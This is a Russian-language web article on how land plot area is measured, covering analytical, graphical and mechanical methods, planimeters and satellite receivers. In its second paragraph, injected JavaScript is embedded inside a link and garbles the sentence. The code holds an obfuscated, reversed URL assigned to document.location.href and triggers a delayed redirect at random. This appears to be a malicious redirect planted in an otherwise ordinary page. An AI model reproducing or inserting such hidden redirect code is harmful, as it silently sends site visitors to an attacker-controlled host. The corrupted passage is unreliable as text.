Добавить в закладки

Как измеряют площадь земли?

Самым распространенным мероприятием в геодезической области является измерения площади земельного участка. Все дело в том, что без этого просто невозможно представить себе работу земельного кадастра. При этом хочется отметить, что причин для выполнения столь ответственного мероприятия может быть множество. В частности, это касается изучения природных богатств, находящихся в почве, или же возведения сооружения на земельном участке. Соответственно при любой ситуации приходится в обязательном порядке измерять площадь территории, дабы тем самым правильно рассчитать план будущего строения. Для того чтобы справиться с такой задачей, можно использовать один из трех существующих способов.

Для tobor-latigid//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tonex.com.ua/info/inzhen.html»>определения площадей участков идеально подходят следующие методы.

Во-первых, здесь можно прибегнуть к выполнению аналитического способа, благодаря которому измеряется земельный участок посредством вычисления сторон и углов. Если же говорить о достаточно обширных территориях, их рекомендуется в самом начале разбить на несколько небольших участков, имеющих название полигон.

Во-вторых, также можно применить графический метод с топографической основой. В этом случае основным инструментом является карта с определенным масштабом, благодаря которой можно с легкостью выполнить замеры участка или же каждого отдельного полигона.

В-третьих, механический метод пользуется особой распространенностью в современном мире, за счет своей эффективности. Все дело в том, что в данном случае вычисление площади земельного участка осуществляется посредством применения специальных устройств и инструментов.

Конечно же, существуют ситуации, при которых крайне важно одновременно использовать все существующие способы для получения максимального результата. К тому же площадь земли можно с легкостью рассчитать на компьютерном оборудовании. Для этого достаточно сформировать цифровую модель территории, а также просчитать важные показатели.

Чаще всего для выполнения подобных геодезических изысканий используется специальное приспособление, называемое планометром. Оно может быть как механического, так и электронного типа. Однако последнее устройство отличается особой эффективностью. А все потому, что дает возможность определять размеры земли, а также сохранять полученные координаты в памяти.

Еще одним наиболее прогрессивным способом в современном мире считается применение спутникового сигнала, позволяющего получать особенно точные координаты. С этой целью на территории размещается несколько приемников, способных координировать датчики и выдавать точную информацию о площади определенного участка земли.

Добавить в избранное Версия для печати
Поделитесь:
Рейтинг статьи:
Автор: admin
Опубликовано: 27.08.2021





Оставить комментарий

ОБЯЗАТЕЛЬНО приложите ФОТО проблемы - так ответ эксперта будет гораздо точней

Оставляя комментарий, Вы принимаете пользовательское соглашение

Ваше имя:
Ваш e-mail: